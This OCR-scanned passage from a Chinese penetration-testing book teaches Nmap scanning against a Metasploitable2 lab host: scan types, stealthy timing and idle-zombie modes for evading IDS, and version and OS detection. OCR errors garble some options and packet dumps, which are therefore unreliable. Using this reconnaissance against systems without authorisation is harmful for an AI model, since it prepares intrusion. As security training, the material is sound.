应 当 养 成 时 常 更 新 Nmap 的 好 习惯 。 如 果 需 要 在 Kali Linux 里 安装 
最 新 版 本 的 Namp 程序 ， 您 可 使 用 下 述 指令 。 

apt-get Update 

apt-get install nmap 

在 控制 台 终 端 启动 Nmap 的 指令 如 下 。 











上 述 命 令 将 显示 该 程序 的 所 有 可 选项 及 使 用 说 明 。 刚 刚 接 触 Nmap 
的 新 手 可 能 会 因为 信息 量 太 大 而 觉得 无 从 下 手 。 

羊 运 的 是 ， 您 仅 需 指定 一 个 参数 即 可 局 动 扫描 。 这 个 参数 就 是 目标 
主机 的 IP 地 址 或 主机 名 称 〈 如 果 要 使 用 主机 名 称 ， 您 首先 需要 给 您 的 主 
机 配置 一 个 能 够 解析 它 的 ”DNS 服务 器 〉。 例 如 ， 您 可 以 使 用 下 述 指 
ae 

nmap 192.168.56.103 

在 没有 指定 其 他 选项 的 情况 下 ， 上 述 指令 的 输出 结果 如 下 。 

Nmap scan report for 192.168.56.103 

Host is up (0.0046s latency). 





Not shown: 977 closed ports 
PORT STATE SERVICE 
21/tcp open ftp 

22/tcp open ssh 


23/tcp open telnet 

25/tcp open smtp 

53/tcp open domain 

80/tcp open http 

111/tcp open rpcbind 

139/tcp open netbios-ssn 

445/tcp open microsoft-ds 

512/tcp open exec 

513/tcp open login 

514/tcp open shell 

1099/tcp open rmiregistry 

1524/tcp open ingreslock 

2049/tcp open nfs 

2121/tcp open ccproxy-ftp 

3306/tcp open mysql 

5432/tcp open postgresql 

5900/tcp open vnc 

6000/tcp open X11 

6667/tcp open irc 

8009/tcp open ajp13 

8180/tcp open unknown 

MAC Address: 08:00:27:43:15:18 (Cadmus Computer Systems) 

Nmap done: 1 IP address (1 host up) scanned in 13.49 seconds 

上 述 结 果 表 明 目 标 主机 开放 了 很 多 端口 。 我 们 可 以 依 此 判断 它 容 易 
遭受 攻击 。 

在 继续 演示 Nmap 之 前 ， 我 们 介绍 一 下 Nmap 可 以 识别 出 的 6 种 端口 
状态 。 这 6 种 端口 状态 如 下 。 


e 开放 : 工作 于 开放 端口 的 服务 器 端的 应 用 程序 可 以 受理 TCP 连 
接 、 接 收 UDP 数据 包 或 者 响应 SCTP 〈 流 控制 传输 协议 ) 请 求 。 

e Ki): 虽然 我 们 确实 可 以 访问 有 关 的 端口 ， 但 是 没有 应 用 程序 工 
作 于 该 端口 上 。 

e 过 滤 : Nmap 不 能 确定 该 端口 是 否 开放 。 包 过 滤 设 备 屏 珊 了 我 们 
向 目标 发 送 的 探测 包 。 

e 未 过 滤 : 虽然 可 以 访问 到 指定 端口 ， 但 Nmap 不 能 确定 该 端口 是 
人 否 处 于 开放 状态 。 

e 打开 | VE: Nmap 认为 指定 端口 处 于 开放 状态 或 过 滤 状 态 ， 但 
是 不 能 确定 处 于 两 者 之 中 的 哪 种 状态 。 在 遇 到 没有 响应 的 开放 端口 时 ， 
Nmap 会 作出 这 种 判断 。 这 可 以 是 由 于 防火 墙 丢 弃 数 据 包 造 成 的 。 

e 关闭 | 过 滤 : Nmap 认为 指定 端口 处 于 关闭 状态 或 过 滤 状 态 ， 但 
是 不 能 确定 处 于 两 者 之 中 的 哪 种 状态 。 

介绍 了 端口 状态 之 后 ， 下 面 将 介绍 几 个 在 渗透 测试 中 常用 的 Nmap 
选项 。 而 后 ， 我 们 将 进行 实际 演示 。 

1. 指定 扫描 目标 

Nmap 把 指令 中 选项 和 参数 以 外 的 内 容 均 当 作 目 标 主 机 来 处 理 。 我 
们 建议 您 以 主机 IP 地 址 而 非 主机 名 的 形式 指定 目标 主机 。 以 IP 地 址 的 
形式 指定 目标 主机 ，Nmap 右 不 必 在 扫描 之 前 进行 DNS 解 析 ， 这 样 可 以 
提高 端口 扫描 的 速度 。 

您 可 以 以 下 述 几 种 形式 ， 为 当前 版 本 的 Nmap 指 定 扫 摘 目标 的 IPv4 
地 址 。 

e 单个 主机 ， 如 192.168.0.1。 

e 以 | CIDR ”标记 法 表示 的 地 址 相连 的 整个 网 段 。 例 如 ， 
192.168.0.0/24 表示 从 192.168.0.0 到 192.168.0.255 的 256 个 IP 地 址 。 

o ”十进制 的 PP 区间。 例如 ，192.168.2-4,6.1 ”表示 4 个 IP 地 址 : 
192.168.2.1、192.168.3.1、192.168.4.1 和 192.168.6.1。 





e 多 个 主机 目标 ， 如 192.168.2.1 172.168.3-5,9.1。 
Nmap 仅 支持 标准 格式 的 了 Pv6 地 址 和 以 主机 名 方式 指定 的 IPv6 主 机 
Jh. 
除了 可 在 命令 行 里 指定 目标 主机 以 外 ， 您 还 可 以 指定 -让 
<inputfilename> 选 项 ， 令 Nmap 程序 从 指定 的 文本 文件 中 读 取 目标 主机 
的 清单 。 当 需要 从 其 他 程序 的 运行 结 采 里 导出 耳 地 址 给 Nmap 使 用 时 ， 
这 个 功能 融 十 分 有 用 。 
务必 确保 文件 采用 的 是 Nmap 支持 的 指定 格式 。 即 ， 使 用 空格 、 制 
表 符 或 换行 符号 间隔 不 同 的 目标 主机 。 
举例 来 说 ， 目 标清 单 文件 可 以 如 下 所 示 。 
192.168.1.1-254 
192.168.2.1-254 
现在 ， 我 们 开始 扫描 192.168.56.0/24 这 个 网 段 。 另 外 ， 我 们 需要 使 
用 数据 包 捕 获 〈 监 听 ) 工具 观察 Nmap 发 送 的 数据 包 。 此 时 可 以 使 用 
tcpdump 程 序 。 
我 们 可 以 打开 终端 窗口 ， 然 后 使 用 下 述 指令 。 
tcpdump -nnX tcp and host 192.168.56.102 
在 本 例 中 ，192.168.56.102 是 运行 Nmap 程 序 的 主机 的 IP 地 址 。 请 根 
据 您 的 实际 情况 进行 相应 调整 。 
现在 新 建 一 个 终端 窗口 ， 然 后 并 执行 下 述 命令 。 
nmap 192.168.56.0/24 
tcpdump 终 端 窗口 会 显示 捕获 的 数据 包 。 
22:42:12.107532 IP 192.168.56.102.49270 > 192.168.56.103.23: 
Flags [S], seq 239440322, win 1024, options [mss 1460], length 0 
0x0000: 4500 002c eb7f 0000 3006 ad2e c0a8 3866 E..,....0.....8f 
0x0010: c0a8 3867 c076 0017 0e45 91c2 0000 0000 ..8g.v...E...... 
0x0020: 6002 0400 4173 0000 0204 05b4 As...... 











根据 以 上 信息 ， 我 们 知道 实施 扫 摘 的 主机 从 49270 端 口 向 目标 主机 
的 23 端 口 〈telnet) 发送 了 含有 SYN 标识 位 的 数据 包 。 默 认 情 况 下 ， 在 
Kali Linux 里 以 特权 用 户 〈 如 root) 身份 启动 Nmap 后 ， 程 序 发 送 的 数据 
包 都 会 设 有 SYN 标 识 位 。 

tcpdump 程 序 还 会 收集 实施 扫描 的 主机 发 送 的 其 他 数据 包 《〈 见 图 
6.3) 。 





22:31:01.766788 IP 192.168.56.102.39755 > 192.168.56.101.22939: Flags [S], seq 340921615, 
win 1024, options [mss 1460], length © 

0x0000: 4500 002c 1714 0000 3506 7c9c c0a8 3866 E..,.... = res aT 

0x0010: cOa8 3865 9b4b 599b 1452 0d6f 0000 0000  ..8e.KY..R...... 

0x0020: 6002 0400 8bc2 0000 0204 05b4 T nne iM RI dtu 
22:31:01.769945 IP 192.168.56.102.39754 > 192.168.56.100.1216: Flags [S], seq 340987150, w 
in 1024, options [mss 1460], length 0 

0x0000: 4500 002c 40b8 0000 3406 53f9 cOa8 3866 E..,0...4.8...8f 

0x0010: c@a8 3864 9b4a O04cO 1453 BdGe 0000 0000 ..8d.J...S...... 

0x0020: 6002 0400 e09f 0000 0204 05b4 "CR SR REIS 
22:31:01.777222 IP 192.168.56.102.39755 » 192.168.56.100.22939: Flags [S], seq 340921615, 
win 1024, options [mss 1460], length 6 

0x0000: 4500 002c e034 0000 3b06 ad7c cOa8 3866 E..,.4..;..|..8f 

0x0010: cGa8 3864 9b4b 599b 1452 0dOf 0000 0000  ..8d.KY..R...... 

0x0020: 6002 0400 8bc3 0000 0204 05b4 MYERS TE 
22:31:01.786871 IP 192.168.56.102.39755 » 192.168.56.101.99: Flags [S], seq 340921615, win 

1024, options [mss 1460], length 0 

0x0000: 4500 002c c6cl 0000 3106 dOee cOa8 3866 E..,.... 8f 

0x0010: dc0a8 3865 9b4b 0063 1452 OdOf 0000 0000 ..8e.K.c.R...... 
: 6002 0400 e4fa 0000 0204 Q5b4 er De 


图 6.3 
目标 主机 可 能 会 回复 的 下 述 啊 应 信息 。 
22:36:19.939881 IP 192.168.56.103.1720 > 192.168.56.102.47823: 
Flags [R.], seq 0, ack 1053563675, win 0, length 0 
0x0000: 4500 0028 0000 4000 4006 48b2 c0a8 3867 E..(..@.@.H...8g 
0x0010: c0a8 3866 06b8 bacf 0000 0000 3ecc 1b1b ..8f........ >... 
0x0020: 5014 0000 a243 0000 0000 0000 0000 BiG nas, 
请 注意 : 上 述 报 头 文 含有 R (Brese [EA] ) 标识 。 也 就 是 说 ， 
目标 主机 的 1720 端 口 处 于 关闭 状态 。 我 们 可 以 根据 Nmap 的 扫描 结 末 验 
证 这 个 判断 。 
但 是 ， 如 果 端 口 处 于 开放 状态 ， 您 看 到 的 网 络 流量 则 会 大 体 如 下 。 
22:42:12.108741 IP 192.168.56.103.23 > 192.168.56.102.49270: 














Flags [S.], seq 1611132106, ack 239440323, win 5840, 

options [mss 1460], length 0 

0x0000: 4500 002c 0000 4000 4006 48ae c0a8 3867 E..,..@.@.H...8g 
0x0010: c0a8 3866 0017 c076 6007 ecca 0e45 91c3 ..8f...v'....E.. 
0x0020: 6012 16d0 e1bf 0000 0204 05b4 0000 

从 中 可 以 看 出 ， 这 个 数据 包 确 认 了 前 一 个 数据 包 的 序列 号 。 前 一 个 
数据 包 的 序列 号 是 239440322， 这 个 数据 包 的 确认 号 是 239440323。 

2. TCP 扫 描 选 项 

只 有 操作 系统 的 高 权限 用 户 ( UNIX 环境 下 的 root 级 别 用 户 或 者 
Windows 下 的 administrator 级 别 用 户 ) 才能 使 用 Nmap 多 数 选 项 。 程 序 需 
要 相应 的 权限 才能 发 送 和 接收 原始 数据 包 。 默 认 情 况 下 ，Nmap 会 采用 
TCP SYN 扫描 。 在 权限 不 足 的 情况 下 ，Nmap 将 进行 TCP 连 接 扫描 。 具 
体 来 说 ，Nmap 程 序 文 持 的 扫描 方式 分 别 如 下 。 

e TCP ÆRA CsT): 指定 这 个 选项 后 ， 程 序 将 和 目标 主机 的 
每 个 端口 都 进行 完整 的 三 次 握手 。 如 果 成 功 建立 连接 ， 则 判定 该 端口 是 
开放 问 口 。 由 于 在 检测 每 个 端口 时 都 需要 进行 三 次 握手 ， 所 以 这 种 扫描 
方式 比较 慢 ， 而 且 扫 描 行 为 很 可 能 被 目标 主机 记录 下 来 。 如 采 局 动 
Nmap 的 用 户 的 权限 不 足 ， 那 么 默认 情况 下 Nmap 程 序 将 以 这 种 模式 进行 
扫描 。 

e SYN 扫描 〈-sSS) : 该 选项 也 称 为 半 开 连接 或 者 SYN stealth. X 
用 该 选项 后 ，Nmap 将 使 用 含有 SYN 标 志 位 的 数据 包 进 行 端口 探测 。 如 
果 目 标 主机 回复 了 SYN/ACK 包 ， 则 说 明 该 端口 处 于 开放 状态 : 如 果 回 
复 的 是 RST/ACK 包 ， 则 说 明 这 个 问 口 处 于 关闭 状态 :如 果 没 有 任何 响 
应 或 者 发 送 了 ICMP unreachable 信 息 ， 则 可 认为 这 个 端口 被 屏蔽 了 。 
SYN 模 式 的 扫描 速度 非常 好 。 而 且 由 于 这 种 模式 不 会 进行 三 次 握手 ， 所 
以 是 一 种 十 分 隐蔽 的 扫描 方式 。 如 有 果 局 动 Nmap 的 用 户 有 局 级 别 权限 ， 
那么 在 默认 情况 下 Nmap 程 序 将 以 这 种 模式 进行 扫描 。 














e TCP NULL (-sN) 、FIN (-sF) 及 XMAS (-sX) 扫描 : NULL 扫 
描 不 设置 任何 控制 位 ，FIN 扫 摘 仪 设置 FIN 标 志 位 : XMAS AFH V EL 
FIN、PSH 和 URG 的 标识 位 。 如 果 目 标 主机 返回 了 含有 RST 标识 位 的 啊 
应 数据 ， 则 说 明 该 端口 处 于 关闭 状态 ; 如 果 目 标 主机 没有 任何 回应 ， 则 
该 端口 处 于 打开 | 过滤 状态 。 

e TCP Maimon 扫 描 (-sM) : Uriel Maimon 首先 发 现 了 TCP 
Maimom 扫 描 方 式 。 这 种 模式 的 探测 数据 包含 有 FIN/ACK 标 识 。 对 于 
BSD 衍 生出 来 的 各 种 操作 系统 来 说 ， 如 有 果 被 测 问 口 处 于 开放 状态 ， 主 机 
将 会 丢弃 这 种 探测 数据 包 ; 如 果 被 测 端口 处 于 关闭 状态 ， 那 么 主机 将 会 
回复 RST。 

e TCPACK Hfi CsA) : 这 种 扫描 模式 可 以 检测 目标 系统 是 否 采 
用 了 数据 包 状 态 监 测 技术 (stateful〉 防 火 墙 ， 并 能 确定 哪些 端口 被 防火 
间 屏 蔽 。 这 种 类 型 的 数据 包 只 有 一 个 ACK 标 识 位 。 如 果 目 标 主机 的 回复 
中 含有 RST 标 识 ， 则 说 明 目 标 主机 没有 被 过 波 。 

e TCP 窗口 扫描 (-sW) : 这 种 扫描 方式 检测 目标 返回 的 RST 数 据 
包 的 TCP 窗 口 字 段 。 如 果 目 标 端口 处 于 开放 状态 ， 这 个 字段 的 值 将 是 正 
值 ， 否 则 它 的 值 应 当 是 0。 

e TCP Idle 扫描 《〈-sI) : 采用 这 种 技术 后 ， 您 将 通过 指定 的 僵尸 主 
机 发 送 扫 摘 数据 包 。 本 机 并 不 与 目标 主机 直接 通信 。 如 果 对 方 网 络 里 有 
IDS，IDS 将 认为 发 起 扫描 的 主机 是 僵尸 主机 。 

Nmap 的 scanflags 选 项 可 设 定 自 定义 的 TCP 扫 擂 方 式 。 这 个 选项 的 参 
数 可 以 用 数字 表示 例如，9 代 表 PSH 和 FIN 标 识 ) 。 这 个 选项 也 支持 标 
识 位 的 符号 缩写 。 在 使 用 符号 缩写 时 ， 仅 需要 将 URG、ACK、PSH、 
RST、SYN、FIN、ECE、CWR、ALL 和 NONE 以 任意 顺序 进行 组 合 。 
例如 : --scanflags URGACKPSH 将 设置 URG、ACK 和 PSH 标识 位 。 

3. UDP 扫描 选项 

Nmap 有 多 种 TCP 扫 描 方式 ， 而 UDP 扫描 仅 有 一 种 扫描 方式 C- 














sU) 。 虽 然 UDP 扫 摘 结 果 没 有 TCP 扫 摘 结 果 的 可 靠 度 高 ， 但 渗透 测试 人 
员 不 能 因此 而 轻视 UDP 扫描 ， 上 毕竟 UDP 端口 代表 着 可 能 会 有 价值 的 服务 
mE. 

UDP 扫 描 的 最 大 问题 是 性 能 问题 。 由 干 Linux 内 核 限制 1 秒 内 最 多 发 
送 一 次 ICMP Port Unreachable 人 信息。 按照 这 个 速度 ， 对 一 台 主 机 的 65536 
个 UDP 端 口 进 行 完整 扫 描 ， 总 耗 时 必定 会 超过 18 个 小 时 。 

改善 扫描 速度 的 方式 主要 有 : 

e 进行 并 发 的 UDP 扫描 ; 

e 优先 扫描 党 用 端口 ; 

e 在 防火 墙 后 面 扫描 ; 

e 局 用 --host-timeout 选项 以 跳 过 响应 过 慢 的 主机 。 

这 些 方法 能 够 减少 UDP 端口 扫 拉 所 需 的 总 体 时 间 。 

假如 我 们 需要 找到 目标 主机 开放 了 哪些 UDP 端口 。 为 提高 扫描 速 
度 ， 我 们 仅 扫描 53 端口 CDNSO 和 161 端 口 CSNMPO 。 此 时 需要 使 用 
PIRES 

nmap -sU 192.168.56.103 -p 53,161 

上 述 指令 的 返回 结果 如 下 。 

Nmap scan report for 192.168.56.103 

Host is up (0.0016s latency). 

PORT STATE SERVICE 

53/udp open domain 








161/udp closed snmp 

4. 目标 端口 选项 

默认 情况 下 ，Nmap 将 从 每 个 协议 的 常用 端口 中 随机 选择 1000 个 端 
口 进行 扫 摘 。 其 nmap-services 文 件 对 端口 的 命中 率 进 行 了 排名 。 

如 需 更 改 端口 配置 ， 可 使 用 Nmap 的 以 下 几 个 选项 。 

o -põnn wh: 只 扫描 指定 的 端口 。 扫 描 1 一 1024 号 端口 ， 可 设 定 该 


选项 为 -p 1-1024。 扫 描 1 一 65535 端 口 时 ， 可 使 用 -p- 选 项 。 
e -FEF《〈 快 速 扫描 ) : 将 仅 扫描 100 个 常用 端口 。 
e -T《〈 顺 序 扫描 ) : 指定 这 个 选项 后 ， 程 序 将 从 按照 从 小 到 大 的 顺 
序 扫描 端口 。 
e --top-ports <1 or greater>: 扫描 nmap-services 里 排名 前 N 的 端口 。 
以 NULL 方 式 扫描 目标 主机 的 22、25 端 口 的 指令 如 下 所 示 。 
nmap -SN -p 22,25 192.168.56.103 
上 述 指令 的 返回 结果 如 下 。 
Nmap scan report for 192.168.56.103 
Host is up (0.00096s latency). 
PORT STATE SERVICE 
22/tcp open|filtered ssh 
25/tcp open|filtered smtp 
80/tcp open|filtered http 
3306/tcp open|filtered mysql 
MAC Address: 08:00:27:43:15:18 (Cadmus Computer Systems) 
Nmap done: 1 IP address (1 host up) scanned in 14.38 seconds 
tcpdump 捕 获 的 信息 如 下 。 
23:23:38.581818 IP 192.168.56.102.61870 > 192.168.56.103.22: Flags 
[], win 1024, length 0 
0x0000: 4500 0028 06e4 0000 2f06 92ce c0a8 3866 E..(..../.....8f 
0x0010: c0a8 3867 flae 0016 dd9e bf90 0000 0000 ..8g............ 
0x0020: 5000 0400 2ad2 0000 Tos 
23:23:38.581866 IP 192.168.56.102.61870 > 192.168.56.103.25: Flags 
[], win 1024, length 0 
0x0000: 4500 0028 1117 0000 3106 869b c0a8 3866 E..(....1.....8f 
0x0010: c0a8 3867 f1ae 0019 dd9e bf90 0000 0000 ..8g............ 


0x0020: 5000 0400 2acf 0000 ps 
23:23:39.683483 IP 192.168.56.102.61871 > 192.168.56.103.25: Flags 
[], win 1024, length 0 
0x0000: 4500 0028 afaf 0000 2706 £202 c0a8 3866 E..(....'.....8f 
0x0010: c0a8 3867 f1af 0019 dd9f bf91 0000 0000 ..8g............ 
0x0020: 5000 0400 2acc 0000 a M 
23:23:39.683731 IP 192.168.56.102.61871 > 192.168.56.103.22: Flags 
[], win 1024, length 0 
0x0000: 4500 0028 5488 0000 3506 3f2a c0a8 3866 E..(T...5.?**..8f 
0x0010: c0a8 3867 f1af 0016 dd9f bf91 0000 0000 ..8g............ 
0x0020: 5000 0400 2acf 0000 mnm 

根据 以 上 信息 ， 我 们 可 以 得 出 下 述 结论 。 

e 第 1 个 数据 包 ， 是 实施 扫描 的 主机 检测 目标 主机 的 22 端口 状态 的 
数据 包 。 一 段 时 间 之 后 ， 它 发 出 了 第 2 个 数据 包 ， 检 测 目标 主机 的 25 端 
Ll. 

e 第 3 个 数据 包 ， 是 实施 扫描 的 主机 检测 目标 主机 的 25 端口 状态 的 
数据 包 。 一 段 时 间 之 后 ， 它 发 出 了 第 4 个 数据 包 ， 检 测 目 标 主 机 的 22 端 
Ll. 

e 过 了 一 段 时 间 之 后 ， 目 标 主机 仍然 没有 进行 任何 啊 应 。Nmap Jj 
定 这 两 个 端口 处 于 开放 状态 或 过 小 状态 。 

5. 输出 选项 

Nmap 可 以 把 扫描 结果 保存 为 外 部 文件 。 在 需要 使 用 其 他 工具 处 理 
Nmap 的 扫描 结果 时 ， 这 一 功能 十 分 有 用 。 

即使 您 设 定 程序 把 扫描 结果 保存 为 文件 ，Nmap 还 是 会 在 屏幕 上 显 
ANTH R o 

Nmap 文 持 以 下 儿 种 输出 形式 。 

e XZH EF) 输出 : Nmap 把 扫描 结果 发 送 到 标准 输出 设备 上 























(通常 为 终端 /控制 台 ) ， 这 是 默认 的 输出 方式 。 
e (Ema CoN): 与 交互 输出 类 似 ， 但 是 不 显示 runtime 信息 和 
警告 信息 。 


e XML 文件 〈-oX) : 生成 的 XML 格式 文件 可 以 转换 成 HTML 格 
式 文件 ， 还 可 被 Nmap 的 图 形 用 户 界 面 解析 ， 也 便于 导入 数据 库 。 本 文 
建议 您 尽量 将 扫 插 结果 输出 为 XML 文 件 。 

e ”生成 便于 Grep 使 用 的 文件 〈-oG) : 虽然 这 种 文件 格式 已 经 过 
时 ， 但 仍然 很 受 欢 迎 。 这 种 格式 的 文件 ， 其 内 容 由 注释 〈 由 # 开 始 ) 和 
音 奶 行 组 成 。 信 息 行 包含 6 个 字段 ， 每 个 字段 的 字段 名 称 和 字段 值 以 冒 
号 分 割 ， 字 段 之 间 使 用 制 表 符 隔 开 。 这 些 字段 的 名 称 分 别 为 Host、 
Ports, Protocols. Ignored State. OS. Seq Index. IP ID Seq 和 Status. 
这 种 格式 的 文件 便于 grep 或 awk 之 类 的 UNIX 指令 整理 扫描 结果 。 

还 可 以 通过 -oA 选 项 ， 让 Nmap 程 序 把 扫描 结 采 同时 以 三 种 形式 〈 正 
常 输出 、XML 文 件 和 便于 Grep 使 用 的 文件 ) 进行 输出 。 

如 需 把 保存 扫描 结果 保存 为 XML 文件 (myscan.xml) ， 可 使 用 下 述 


指令 。 











nmap 192.168.56.103 -oX myscan.xml 

以 下 是 XML 文件 中 的 部 分 内 容 。 

<?xml version="1.0"?> 

<?xml-stylesheet href-"file:///usr/bin/../share/nmap/nmap.xsl" 
type-"text/xsl"?» 

«1-- Nmap 6.25 scan initiated Sat Jul 20 23:50:25 2013 
as: nmap -oX myscan.xml 192.168.56.103 --> 

<nmaprun scanner="nmap" args="nmap -OX myscan.xml 

192.168.56.103" 

start="1374339025" startstr="Sat Jul 20 23:50:25 2013" 


version="6.25" xmloutputversion="1.04"> 


<scaninfo type="syn" protocol="tcp" numservices="1000" 
services="1,3-4,6-7,9,13,17,19-26,30,32-33,37,42 
<some port numbers are deleted for brevity> 
50003,50006,50300,50389,50500,50636,50800,51103,51493, 
52673,52822,52848,52869,54045,54328,55055- 
55056,55555,55600,56737 
56738,57294,57797,58080,60020,60443,61532,61900,62078,63331,646: 
64680,65000,65129,65389"/» 
<verbose level="0"/> 
<debugging level="0"/> 
<host starttime="1374339025" endtime="1374339038"><status 
state="up" reason="arp-response" reason_ttl="0"/> 
«address addr="192.168.56.103" addrtype="ipv4"/> 
«address addr="08:00:27:43:15:18" addrtype="mac" vendor="Cadmus 
Computer Systems"/> 
因为 HTML 格式 的 文件 比 XML 格式 的 文件 更 易于 阅读 ， 所 以 我 们 
通常 会 把 XML 格式 文件 转换 成 HTML 格 式 文 件 。 我 们 可 使 用 xsltproc 进 
行 这 种 格式 转换 。 该 程序 的 用 法 如 下 。 
xsltproc myscan.xml -0 myscan.html 
使 用 Kali Linux 自 带 的 Iceweasel Web 浏览 器 打开 这 个 HTML 文件 
〈 见 图 6.4) 。 
XML 的 处 理 程序 能 够 处 理 Nmap 生 成 的 XML 文件 。 很 多 编程 语言 都 
融 有 XML 通用 处 理 库 。 其 中 ， 下 述 几 种 语言 专门 开发 出 了 可 供 处 理 
Nmap XML 报告 的 库 。 
e Perl: Nmap-Parser Chttp://search.cpan.org/dist/Nmap-Parser/) o 
e Python: python-nmap Chttp://xael.org/norman/python/python- 


nmap/) 。 


e Ruby: Ruby Nmap Chttp://rubynmap.sourceforge.net/) 。 
e PowerShell: 专门 处 理 Nmap XML 格式 报告 的 PowerShell 脚 本 程序 
http://www. sans.org/windows-security/2009/06/1 1/powershell-script- 


toparse-nmap-xml-output) . 





192.168.56.103 


Address 


e 192.168.56.103 (ipv4) 
e 08:00:27:43:15:18 - Cadmus Computer Systems (mac) 


Ports 


The 977 ports scanned but not shown below are in state: closed 


* 977 ports replied with: resets 


syn-ack 





syn-ack 























6. 时 间 排 程控 制 选 项 

Nmap 可 通过 -T 选 项 指定 时 间 排 程控 制 的 模式 。 它 有 6 种 扫描 模式 。 

e paranoid (0) : 每 5 分 钟 发 送 一 次 数据 包 ， 且 不 会 以 并 行 方 式 同 
时 发 送 多 组 数据 。 这 种 模式 的 扫描 不 会 被 IDS 检 测 到 。 

e sneaky (1) : 每 隔 15 秒 发 送 一 个 数据 包 ， 且 不 会 以 并 行 方 式 同 时 
发 送 多 组 数据 。 

e polite (2) : 每 0.4 秒 发 送 一 个 数据 包 ， 且 不 会 以 并 行 方式 同时 发 
送 多 组 数据 。 

e normal (3) : 此 模式 同时 间 多 个 目标 发 送 多 个 数据 包 ， 为 Nmap 
默认 的 模式 ， 访 模式 能 自动 在 扫 拉 时间 和 网 络 负载 之 间 进 行 平衡 。 

e aggressive (4) : 在 这 种 模式 下 ，Nmap 对 每 个 既定 的 主机 只 扫 
描 5 分 钟 ， 然 后 扫描 下 一 台 主 机 。 它 等 待 响应 的 时 间 不 超过 1.25 秒 。 











e insane (5) : 在 这 种 模式 下 ，Nmap 对 每 个 既定 的 主机 仅 扫 描 75 
秒 ， 然 后 扫描 下 一 台 主 机 。 它 等 待 响应 的 时 间 不 超过 0.3 秒 。 
我 们 的 经 验 表 明 ， 默 认 的 扫描 模式 通常 都 没有 问题 。 除 非 您 想 要 进 
行 更 隐匿 或 更 快速 的 扫描 ， 人 否则 没有 必要 调整 这 一 选项 。 
7. 第 用 选项 
本 节 将 讨论 Nmap 的 几 个 非常 有 用 的 选项 。 
服务 版 本 识别 
Nmap 程序 可 以 在 进行 端口 扫描 的 时 候 检 测 服务 器 软件 的 版 本 信 
。 版 本 信息 将 使 后 续 的 漏洞 识别 工作 更 有 针对 性 。 
如 需 局 用 这 一 功能 ， 就 要 指定 Nmap 的 -sSV 选 项 。 
例如 ， 在 获取 目标 主机 22 端 口上 的 服务 程序 的 版 本 信息 时 ， 可 使 用 
PIRES 
nmap -sV 192.168.56.103 -p 22 
上 述 指令 的 返回 结果 如 下 。 
Nmap scan report for 192.168.56.103 
Host is up (0.0016s latency). 
PORT STATE SERVICE VERSION 
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntul (protocol 2.0) 
上 述 信息 表明 : 目标 主机 的 22 端 口 处 于 开放 状态 ， 它 的 服务 端 程序 
是 4.7p1 版 本 的 OpenSSH， 通 信 协 议 是 SSH 2.0. 
操作 系统 检测 
Nmap 还 能 识别 目标 主机 的 操作 系统 。 
如 需 启 用 这 一 功能 ， 就 要 指定 Nmap 的 -O 选 项 。 
例如 ， 在 获取 目标 主机 的 操作 系统 信息 时 ， 可 使 用 下 述 指 令 。 
nmap -O 192.168.56.103 
上 述 指令 的 返回 结果 如 下 。 
Host is up (0.0037s latency). 








CI 





Not shown: 977 closed ports 
PORT STATE SERVICE 
21/tcp open ftp 

22/tcp open ssh 

23/tcp open telnet 

25/tcp open smtp 

53/tcp open domain 

80/tcp open http 

111/tcp open rpcbind 
139/tcp open netbios-ssn 
445/tcp open microsoft-ds 
512/tcp open exec 

513/tcp open login 

514/tcp open shell 

1099/tcp open rmiregistry 
1524/tcp open ingreslock 
2049/tcp open nfs 

2121/tcp open ccproxy-ftp 
3306/tcp open mysql 
5432/tcp open postgresql 
5900/tcp open vnc 
6000/tcp open X11 
6667/tcp open irc 

8009/tcp open ajp13 
8180/tcp open unknown 
MAC Address: 08:00:27:43:15:18 (Cadmus Computer Systems) 


Device type: general purpose 


Running: Linux 2.6.X 

OS CPE: cpe:/o:linux:linux_kernel:2.6 

OS details: Linux 2.6.9 - 2.6.33 

Network Distance: 1 hop 

上 述 信息 表明 ， 服 务 器 使 用 的 是 基于 2.6.9-2.6.33 版 本 Linux 内 核 的 
Linux 系 统 。 如 果 这 个 Linux 内 核 上 存在 漏洞 ， 我 们 就 可 以 利用 这 些 漏 
洞 。 

禁用 主机 检测 

如 果 主 机 屏 贡 了 ping 请 求 ，Nmap 可 能 会 认为 该 主机 没有 开机 。 这 
将 使 得 Nmap 无 法 进行 进一步 检测 ， 比 如 端口 扫 摘 、 服 务 版 本 识别 和 操 
作 系 统 识别 等 探测 工作 。 为 了 克服 这 一 问题 ， 就 需要 禁用 Nmap 的 主机 
检测 功能 。 在 指定 这 个 选项 之 后 ，Nmap 会 认为 目标 主机 已 经 开机 并 会 
进行 全 套 的 检测 工作 。 

如 需 启 用 这 一 功能 ， 就 要 指定 Nmap 的 -Pn 选 项 。 

强力 检测 选项 

局 用 -A 选 项 之 后 ，Nmap 将 检测 目标 主机 的 下 述 信息 : 

e 服务 版 本 识别 CsV) ; 

e 操作 系统 识别 〈-O) ; 

e 脚本 扫描 《〈-sSC) ; 

e Traceroute (--traceroute) 。 

这 种 扫描 类 型 的 扫描 时 间 较 长 。 举 例 来 说 ， 可 使 用 下 述 扫 描 指 令 。 

nmap -A 192.168.56.103 

上 述 指令 的 返回 结果 如 下 。 

PORT STATE SERVICE VERSION 

21/tcp open ftp vsftpd 2.3.4 

| ftp-anon: Anonymous FTP login allowed (FTP code 230) 

22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) 


| ssh-hostkey: 1024  60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd 
(DSA) 

| 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA) 

80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) 

|_http-methods: No Allow or Public header in OPTIONS response 
(status code 200) 

|_http-title: Metasploitable2 — Linux 


Host script results: 

|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: 
<unknown>, NetBIOS 

MAC: <unknown> 

| smb-os-discovery: 

| OS: Unix (Samba 3.0.20-Debian) 

| NetBIOS computer name: 

| Workgroup: WORKGROUP 

|_ System time: 2013-07-21T09:20:22-04:00 

TRACEROUTE 

HOP RTT ADDRESS 

1 1.66 ms 192.168.56.103 

8. 扫描 IPv6 主 机 

前 文 介绍 过 ，Nmap 能 够 扫描 IPv6 环 境 里 的 主机 ， 本 节 将 进行 细致 
说 明 。 

本 例 涉及 的 IP ve 地 址 如 下 。 

目标 主机 : fe80::a00:27ff:fe43:1518 

局 用 Nmap 的 -6 选项 即 可 扫 摘 IPv6 的 目标 主机 。 

